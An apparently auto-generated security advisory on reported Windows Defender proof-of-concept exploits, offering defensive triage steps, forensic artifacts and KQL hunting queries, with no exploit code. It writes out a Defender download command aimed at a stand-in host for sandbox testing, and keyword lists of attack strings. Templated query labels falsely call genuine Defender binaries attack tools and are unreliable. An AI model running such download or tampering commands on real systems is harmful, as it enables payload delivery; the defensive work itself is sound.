← Back to Cybersecurity News Center
Severity
CRITICAL
CVSS
9.5
Priority
0.750
×
Tip
Pick your view
Analyst for full detail, Executive for the short version.
Analyst
Executive
Executive Summary
Three proof-of-concept exploits targeting Windows Defender have been publicly disclosed in security news reporting (not yet assigned CVE identifiers), enabling attackers to weaponize Microsoft's own trusted security platform as a living-off-the-land attack vector. Two of the three vulnerabilities remain unpatched, leaving enterprise environments without vendor-supplied remediation and no reliable way to remove the attack surface without disabling core endpoint protection. This disclosure signals a maturing attacker playbook: rather than bypassing security tools, adversaries are learning to operate through them, fundamentally challenging the assumption that trusted system components are safe to run with elevated privilege.
Impact Assessment
CISA KEV Status
Not listed
Threat Severity
CRITICAL
Critical severity — immediate action required
Actor Attribution
HIGH
Unknown — attribution not established in available reporting
TTP Sophistication
HIGH
7 MITRE ATT&CK techniques identified
Detection Difficulty
HIGH
Multiple evasion techniques observed
Target Scope
INFO
Microsoft Windows Defender (built-in endpoint security platform, specific versions unconfirmed in source data)
Are You Exposed?
⚠
Your industry is targeted by Unknown — attribution not established in available reporting → Heightened risk
⚠
You use products/services from Microsoft Windows Defender (built-in endpoint security platform → Assess exposure
⚠
7 attack techniques identified — review your detection coverage for these TTPs
✓
Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓
You have incident response procedures for this threat type → Prepared
Business Context
Windows Defender is deployed by default across virtually every Windows enterprise environment, meaning the exposed attack surface is near-universal without requiring any misconfiguration or optional software installation. With two vulnerabilities unpatched and no CVE-anchored remediation timeline from Microsoft, security teams face an indeterminate exposure window during which attackers can abuse a component organizations cannot simply remove. If exploitation moves from proof-of-concept to active threat actor use, organizations may face incident response costs, regulatory scrutiny under breach notification obligations, and reputational damage tied to a security failure rooted in the security tool itself.
You Are Affected If
Your organization runs Windows Defender as primary or layered endpoint protection on Windows workstations, servers, or cloud instances
Your EDR or SIEM platform excludes Windows Defender processes from behavioral monitoring or alerting by default
Your environment relies on Windows built-in security controls as a primary defense layer without compensating network or identity controls
Your patch management process is dependent on CVE assignment or MSRC advisories, creating a gap for unassigned vulnerabilities
Your organization operates in a sector with high attacker interest (financial services, healthcare, critical infrastructure) where living-off-the-land techniques are commonly observed in threat intelligence reporting
Board Talking Points
Attackers have demonstrated the ability to weaponize Windows Defender, the security software built into every Windows computer our organization runs, making it a vehicle for attack rather than protection.
Two of the three known attack methods have no patch available; until Microsoft releases fixes, we are hardening monitoring controls and restricting local admin access as compensating measures — this work should begin within the next 5 business days.
If we do not act and these techniques move from proof-of-concept to active exploitation, our standard endpoint defenses may fail to detect an attacker operating silently through a trusted system process, increasing breach risk and potential regulatory exposure.
Technical Analysis
The disclosed proof-of-concept exploits target Windows Defender's privileged, trusted operational context, converting it from a defensive layer into an execution and evasion platform.
The underlying weaknesses map to three CWEs: improper privilege management (CWE-269), incorrect permission assignment for critical resources (CWE-732), and improper access control (CWE-284).
Together, these conditions allow an attacker who has achieved initial access to exploit Defender's elevated trust to escalate privileges, persist without triggering detection, and execute malicious code under the cover of a signed, vendor-trusted process.
The living-off-the-land dimension is the defining feature of this disclosure. MITRE ATT&CK techniques present in the reported activity include T1068 (exploitation for privilege escalation), T1574 (hijack execution flow), T1218 (signed binary proxy execution), T1562.001 (impair defenses: disable or modify tools), T1036 (masquerading), and T1059 (command and scripting interpreter). The convergence of these techniques under a single, trusted process creates a detection gap that most EDR stacks are poorly positioned to close: behavioral rules built to flag anomalous processes typically exclude Defender itself from scrutiny.
Two of the three vulnerabilities lack patches as of publication. Source data originates from security news reporting (Dark Reading, SQ Magazine, SafeStorz) rather than NVD, CISA KEV, or a Microsoft Security Response Center advisory, and no CVE identifiers were assigned in available reporting. Technical confidence is medium. Organizations should monitor MSRC and NVD for CVE assignment and patch availability. Until CVE identifiers and patches are released, remediation relies on compensating controls. The absence of CVE identifiers and patch status from authoritative sources makes remediation planning difficult and increases the operational window for attackers holding knowledge of these techniques.
For security operations teams, the core defensive gap this exposes is implicit trust in signed system processes. EDR platforms that exclude Defender-associated binaries from behavioral monitoring, or that elevate alerts from Defender processes without scrutiny, are structurally blind to this attack pattern. Detection engineering must now account for the possibility that the security platform itself is the threat actor's vehicle.
Action Checklist IR ENRICHED
Triage Priority:
IMMEDIATE
Escalate to CISO and legal/compliance immediately if forensic review of MpCmdRun.exe execution logs, MPLog files, or Sysmon Event ID 1 (Process Create) reveals Defender binaries spawning unexpected child processes, initiating outbound connections to non-Microsoft infrastructure, or downloading files from external URLs, as this indicates active exploitation of the unpatched PoCs with potential for lateral movement and data exfiltration across the full managed endpoint estate.
1
Step 1: Assess exposure, confirm your organization runs Windows Defender as the primary or layered endpoint security platform on any managed devices, including servers, workstations, and cloud-hosted Windows instances
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: Establishing IR Capability and Asset Awareness
NIST IR-4 (Incident Handling)
NIST SI-5 (Security Alerts, Advisories, and Directives)
CIS 1.1 (Establish and Maintain Detailed Enterprise Asset Inventory)
CIS 2.1 (Establish and Maintain a Software Inventory)
Compensating Control
Run the following PowerShell one-liner across managed endpoints via Group Policy logon script or PSRemoting to enumerate Defender status: `Get-MpComputerStatus | Select-Object AMRunningMode, AntispywareEnabled, RealTimeProtectionEnabled, ComputerID | Export-Csv C:\defender_audit.csv -Append`. For cloud-hosted Windows instances (Azure/AWS), query the guest OS via Systems Manager Run Command or Azure Run Command with the same script. Aggregate CSVs centrally — a 2-person team can parse with `Import-Csv` filtering on `AMRunningMode -ne 'Not running'` to scope exposure.
Preserve Evidence
Before scoping, capture the current Defender operational state as a baseline: export `HKLM\SOFTWARE\Microsoft\Windows Defender` registry hive (specifically `DisableAntiSpyware`, `DisableRealtimeMonitoring` DWORD values) to detect pre-existing tamper; pull `Get-MpThreatDetection` output to identify any Defender alerts already generated against its own process space; collect Windows Event Log — Microsoft-Windows-Windows Defender/Operational (Event IDs 1116, 1117, 5001) to establish a pre-incident detection baseline before exclusion audits potentially alter state.
2
Step 2: Review controls, audit EDR and SIEM exclusion lists (if present) to determine whether Windows Defender processes are whitelisted or deprioritized in behavioral monitoring; if so, evaluate whether those exclusions can be narrowed without breaking legitimate detections. If Defender is already included in monitoring, confirm detection rules account for malicious child process spawning from Defender binaries.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis: Identifying Attack Vectors and Analyzing Indicators
NIST SI-4 (System Monitoring)
NIST AU-2 (Event Logging)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
CIS 8.2 (Collect Audit Logs)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
Compensating Control
Without a commercial EDR, deploy Sysmon with a config that explicitly does NOT exclude MsMpEng.exe (the Defender service process) or MpCmdRun.exe (the Defender command-line utility) — both are prime LoTL abuse binaries in this threat. Use the SwiftOnSecurity Sysmon config as a base but remove any `<Exclude>` rules matching `MsMpEng.exe` or `MpCmdRun.exe` from ProcessCreate (Event ID 1), NetworkConnect (Event ID 3), and ImageLoad (Event ID 7) filters. Forward Sysmon XML logs to a central syslog server (e.g., rsyslog on Linux) for manual review. Write a Sigma rule targeting `ParentImage: '*\MsMpEng.exe'` with unexpected child processes (cmd.exe, powershell.exe, wscript.exe) as the detection condition.
Preserve Evidence
Capture BEFORE narrowing exclusions: export the full exclusion configuration from Defender (`Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess, ExclusionExtension`) and your SIEM/EDR suppression rule lists as timestamped snapshots — these document the pre-remediation attack surface and serve as legal artifacts if exploitation occurred during the exposure window. Also pull Windows Security Event Log Event ID 4688 (Process Creation with command-line auditing enabled) filtered on `ProcessName` containing `MpCmdRun.exe` or `MsMpEng.exe` with unexpected parent-child relationships, which would indicate the PoC abuse pattern of spawning processes through Defender's trusted context.
3
Step 3: Evaluate compensating controls, since two of three vulnerabilities are unpatched, prioritize least-privilege enforcement, local admin access restrictions, and application control policies that limit what processes Defender binaries can spawn or interact with
IR Detail
Containment
NIST 800-61r3 §3.3 — Containment: Selecting a Containment Strategy
NIST IR-4 (Incident Handling)
NIST SI-2 (Flaw Remediation)
NIST SI-7 (Software, Firmware, and Information Integrity)
CIS 4.6 (Securely Manage Enterprise Assets and Software)
CIS 5.4 (Restrict Administrator Privileges to Dedicated Administrator Accounts)
CIS 6.5 (Require MFA for Administrative Access)
Compensating Control
Implement the following in sequence for a resource-constrained team: (1) Use AppLocker or Windows Defender Application Control (WDAC) policy to create a rule that blocks `MpCmdRun.exe` from spawning interpreter processes — deploy via GPO with `Set-AppLockerPolicy`. (2) Enforce local admin restrictions via the Local Administrator Password Solution (LAPS) — free from Microsoft — to eliminate credential reuse that would allow lateral movement after Defender abuse. (3) Configure Windows Firewall via GPO to block outbound connections from `MsMpEng.exe` to non-Microsoft IP ranges (allow only `*.update.microsoft.com` and `*.wdcp.microsoft.com`) using `netsh advfirewall firewall add rule name='Block MsMpEng Outbound' program='%ProgramFiles%\Windows Defender\MsMpEng.exe' action=block dir=out`. This constrains C2 callback potential if the Defender binary is weaponized.
Preserve Evidence
Before implementing application control changes, capture: (1) a process tree snapshot using `Get-Process -IncludeUserName | Where-Object {$_.Path -like '*Defender*'}` to detect any currently anomalous Defender child processes already running; (2) review `C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log` files for entries showing MpCmdRun.exe execution with unusual command-line arguments (e.g., `-DownloadFile`, `-url` flags which enable Defender as a file downloader — a known LoTL abuse vector); (3) collect a memory snapshot of MsMpEng.exe process space using ProcDump (`procdump.exe -ma MsMpEng.exe defender_mem.dmp`) before containment changes, as in-memory indicators of exploitation will not survive process restart.
4
Step 4: Update threat model, add living-off-the-land abuse of trusted security tools as an explicit attack pattern in your threat register; map to MITRE ATT&CK T1218 (signed binary proxy execution) and T1562.001 (impair defenses) for detection coverage review
IR Detail
Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity: Lessons Learned and Detection Improvement
NIST IR-8 (Incident Response Plan)
NIST RA-3 (Risk Assessment)
NIST SI-4 (System Monitoring)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
For teams without a formal threat modeling tool: (1) Add a row to your existing risk register (spreadsheet acceptable) with ATT&CK T1218 and T1562.001 explicitly tied to `MpCmdRun.exe` and `MsMpEng.exe` as the abused binaries, not generic LOLBin categories. (2) Search the Sigma rule repository (github.com/SigmaHQ/sigma) for existing rules matching `MpCmdRun.exe -DownloadFile` (maps to T1218) and Defender service tampering (T1562.001) — at least two community rules exist for these exact patterns. (3) Test detection gap by running `MpCmdRun.exe -DownloadFile -url http://test.example.com -path C:\test.txt` in a sandboxed VM and confirm whether your current logging captures the event before adding the Sigma rule to production.
Preserve Evidence
To establish whether this attack pattern has already been used in your environment prior to threat model update: query Windows Security Event Log Event ID 4688 with command-line auditing enabled, filtering for `MpCmdRun.exe` arguments containing `-DownloadFile`, `-url`, `-Scan -ScanType 3` (custom scan that can be abused), or unusual `-SignatureUpdate` paths pointing to non-Microsoft UNC paths; additionally review PowerShell Script Block Logging (Event ID 4104) for any scripts that invoke `MpCmdRun.exe` programmatically, which would indicate attacker tooling rather than legitimate Defender automation.
5
Step 5: Monitor developments, track Microsoft Security Response Center (MSRC) advisories and CISA KEV for CVE assignments, patch releases, or exploitation-in-the-wild confirmations tied to Windows Defender privilege and access control weaknesses
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: Maintaining IR Readiness Through Threat Intelligence Integration
NIST SI-5 (Security Alerts, Advisories, and Directives)
NIST IR-6 (Incident Reporting)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
Configure free RSS/API-based alerting for a 2-person team with no threat intel platform: (1) Subscribe to the MSRC Security Update Guide RSS feed filtered on product 'Microsoft Defender Antivirus' — direct URL pattern: `https://api.msrc.microsoft.com/cvrf/v2.0/cvrf/<YYYY-MMM>` queried monthly. (2) Set a CISA KEV JSON feed monitor (`https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`) using a daily cron job with `jq '.vulnerabilities[] | select(.product | test("Defender"; "i"))'` to auto-filter Defender entries. (3) Create a GitHub search alert for new public PoC repositories matching 'Windows Defender exploit' or 'MpCmdRun PoC' to detect the PoC maturation of the two currently unpatched vulnerabilities before MSRC formally assigns CVEs.
Preserve Evidence
Establish a monitoring baseline NOW before CVEs are assigned: document the current Defender version on all asset classes using `Get-MpComputerStatus | Select-Object AMProductVersion, AMEngineVersion, AMServiceVersion` — store this as a dated CSV so you can immediately identify which assets require emergency patching the moment MSRC releases fixes for the two unpatched PoCs. Additionally, configure Windows Event ID 1033 (Defender platform update) and 1034 (Defender platform update failed) monitoring so you have auditable proof of patch deployment timing relative to any future exploitation-in-the-wild confirmation.
Recovery Guidance
Once compensating controls are implemented, validate integrity of all Windows Defender binary files (`MsMpEng.exe`, `MpCmdRun.exe`, `mpengine.dll`) via SHA-256 hash comparison against Microsoft's published file version catalog before re-trusting Defender telemetry as a detection source — an attacker who weaponized Defender may have also tampered with its detection engine. Maintain elevated Sysmon and Windows Event Log verbosity on Defender process activity for a minimum of 30 days post-containment or until Microsoft releases patches for the two unpatched vulnerabilities, whichever is longer. Upon patch release, treat the update as a critical emergency change with a 72-hour deployment SLA and re-verify the `AMProductVersion` via `Get-MpComputerStatus` across all asset classes to confirm closure.
Key Forensic Artifacts
MpCmdRun.exe execution history: Windows Security Event Log Event ID 4688 (Process Creation) with command-line auditing enabled, filtered on ImagePath containing MpCmdRun.exe — captures LoTL abuse patterns including -DownloadFile and -url arguments that weaponize Defender as a file retrieval proxy (T1218)
Windows Defender Operational log: Microsoft-Windows-Windows Defender/Operational (Event IDs 1116 threat detected, 1117 action taken, 5001 real-time protection disabled, 5007 configuration changed) located at C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx — configuration change events (5007) specifically reveal if an attacker modified exclusion lists via the PoC to blind Defender to subsequent payloads (T1562.001)
Defender support logs: C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log files contain verbose records of MpCmdRun.exe command-line executions including full argument strings, timestamps, and calling process context — primary artifact for reconstructing PoC exploitation timeline without a SIEM
Registry tamper artifacts: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths and HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes registry keys — attacker exploitation of these vulnerabilities to achieve persistence or blind detection would leave evidence of unauthorized exclusion additions with timestamps recoverable via RegRipper or manual `reg query` output
Sysmon Event ID 7 (ImageLoad) for Defender process space: records of non-Microsoft DLLs loaded into MsMpEng.exe or MpCmdRun.exe process memory — a DLL injection or hijacking variant of these PoCs would appear here as unsigned or low-reputation module loads into the trusted Defender process, recoverable from Sysmon operational log at Microsoft-Windows-Sysmon/Operational
Detection Guidance
Detection for this attack pattern is structurally difficult because the malicious activity occurs within or adjacent to a trusted, signed process.
The following behavioral signals warrant investigation.
Process and execution monitoring: Hunt for Windows Defender-associated processes (MsMpEng.exe, MpCmdRun.exe) spawning unexpected child processes, particularly shells (cmd.exe, powershell.exe) or network-connected binaries.
These parent-child relationships are anomalous and should generate high-confidence alerts regardless of the parent's trusted status.
Privilege escalation indicators: Log and alert on token manipulation events, unexpected privilege grants, or process integrity level changes originating from Defender process space. CWE-269 and CWE-732 exploitation will likely produce token or permission artifacts visible in Windows Security Event logs (Event IDs 4672, 4673, 4688).
Defense impairment: Monitor for modifications to Defender configuration, exclusion lists, or real-time protection status (Event ID 5001, 5004, 5007 in Windows Defender operational logs). T1562.001 techniques may attempt to disable scanning for specific paths or processes used in the attack chain.
Signed binary proxy execution: Review for LOLBin activity (T1218 ) initiated from Defender process context. Sysmon Event ID 1 (process creation) with parent image matching Defender binaries and unexpected command-line arguments is a high-fidelity hunt lead.
Log sources to prioritize: Windows Security Event Log, Windows Defender Operational Log (Microsoft-Windows-Windows Defender/Operational), Sysmon (if deployed), and EDR process tree telemetry. Query for Defender process spawning any interactive or network-capable child process with no corresponding user-initiated scan event.
Indicators of Compromise (3)
Export as
Splunk SPL
KQL
Elastic
Copy All (3)
2 tools
1 url
Type Value Enrichment Context Conf.
⚙ TOOL
MpCmdRun.exe
Windows Defender command-line utility potentially leveraged via privilege escalation exploits to execute malicious actions under trusted process context, evading behavioral detection controls
MEDIUM
⚙ TOOL
MsMpEng.exe
Windows Defender antimalware service engine identified as target process in CWE-269 and CWE-284 exploitation chain; abuse enables privileged execution within trusted security context
MEDIUM
🔗 URL
Pending — refer to Dark Reading (https://www.darkreading.com/cyberattacks-data-breaches/exploits-turn-windows-defender-attacker-tool) for published technical indicators
VT
US
Source reporting may contain PoC repository references, file hashes, or additional technical indicators not reproduced in available summary data
LOW
Platform Playbooks
Microsoft Sentinel / Defender
CrowdStrike Falcon
AWS Security
🔒
Microsoft 365 E3
3 log sources
Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
🛡
Microsoft 365 E5
18 log sources
Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
🔍
E5 + Sentinel
27 log sources
All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
IOC Detection Queries (3)
Known attack tool — NOT a legitimate system binary. Any execution is suspicious.
KQL Query Preview
Read-only — detection query only
// Threat: Windows Defender Weaponized: Three PoC Exploits Enable Living-Off-the-Land Attac
// Attack tool: MpCmdRun.exe
// Context: Windows Defender command-line utility potentially leveraged via privilege escalation exploits to execute malicious actions under trusted process context, evading behavioral detection controls
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName =~ "MpCmdRun.exe"
or ProcessCommandLine has "MpCmdRun.exe"
or InitiatingProcessCommandLine has "MpCmdRun.exe"
| project Timestamp, DeviceName, FileName, FolderPath,
ProcessCommandLine, AccountName, AccountDomain,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
Known attack tool — NOT a legitimate system binary. Any execution is suspicious.
KQL Query Preview
Read-only — detection query only
// Threat: Windows Defender Weaponized: Three PoC Exploits Enable Living-Off-the-Land Attac
// Attack tool: MsMpEng.exe
// Context: Windows Defender antimalware service engine identified as target process in CWE-269 and CWE-284 exploitation chain; abuse enables privileged execution within trusted security context
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName =~ "MsMpEng.exe"
or ProcessCommandLine has "MsMpEng.exe"
or InitiatingProcessCommandLine has "MsMpEng.exe"
| project Timestamp, DeviceName, FileName, FolderPath,
ProcessCommandLine, AccountName, AccountDomain,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
1 URL indicator(s).
KQL Query Preview
Read-only — detection query only
// Threat: Windows Defender Weaponized: Three PoC Exploits Enable Living-Off-the-Land Attac
let malicious_urls = dynamic(["Pending — refer to Dark Reading (https://www.darkreading.com/cyberattacks-data-breaches/exploits-turn-windows-defender-attacker-tool) for published technical indicators"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (4)
Sentinel rule: Suspicious PowerShell command line
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: LOLBin abuse (mshta, regsvr32, rundll32)
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "cmstp.exe", "msiexec.exe")
| where ProcessCommandLine has_any ("http", "ftp", "\\\\", "javascript:", "vbscript:", "scrobj.dll", "/i:", "-decode", "-urlcache")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Security tool tampering
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any (
"Set-MpPreference", "DisableRealtimeMonitoring",
"net stop", "sc stop", "sc delete", "taskkill /f",
"Add-MpPreference -ExclusionPath"
)
| where ProcessCommandLine has_any ("defender", "sense", "security", "antivirus", "firewall", "crowdstrike", "sentinel")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Process name masquerading
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe")
| where not (FolderPath startswith "C:\\Windows\\System32" or FolderPath startswith "C:\\Windows\\SysWOW64" or FolderPath startswith "C:\\Windows\\WinSxS")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp desc
No actionable IOCs for CrowdStrike import (benign/contextual indicators excluded).
No hard IOCs available for AWS detection queries (contextual/benign indicators excluded).
Compliance Framework Mappings
T1203
T1068
T1574
T1059
T1218
T1562.001
+1
SC-7
SI-2
SI-3
SI-4
AC-6
CM-7
+2
5.4
6.8
3.3
6.1
6.2
7.3
+2
MITRE ATT&CK Mapping
T1203
Exploitation for Client Execution
execution
T1068
Exploitation for Privilege Escalation
privilege-escalation
T1574
Hijack Execution Flow
persistence
T1059
Command and Scripting Interpreter
execution
T1218
System Binary Proxy Execution
defense-evasion
T1562.001
Disable or Modify Tools
defense-evasion
T1036
Masquerading
defense-evasion
Guidance Disclaimer
